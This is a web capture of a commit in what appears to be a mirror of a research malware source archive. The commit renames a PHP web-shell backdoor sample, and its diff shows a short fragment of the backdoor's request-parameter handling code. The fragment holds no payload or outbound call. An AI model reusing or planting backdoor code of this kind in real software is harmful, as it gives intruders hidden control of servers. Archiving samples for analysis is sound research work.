mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-20 09:08:52 +00:00
Rename Backdoor.PHP.PhpShell.l to Backdoor.PHP.Macker.a
This commit is contained in:
parent
4c232d478c
commit
687be7ffe4
@ -54,10 +54,12 @@ if (isset($_PUT)) walkArray($_PUT);
|
||||
if (isset($_GET)) walkArray($_GET);
|
||||
if (isset($_POST)) walkArray($_POST);
|
||||
|
||||
|
||||
$pos = strpos($urlAdd, "s=r");
|
||||
if (strval($pos) != "") {
|
||||
$urlAdd= substr($urlAdd, 0, $pos);
|
||||
}
|
||||
|
||||
$urlAdd .= "&s=r&";
|
||||
|
||||
if (empty($Pmax))
|
Loading…
Reference in New Issue
Block a user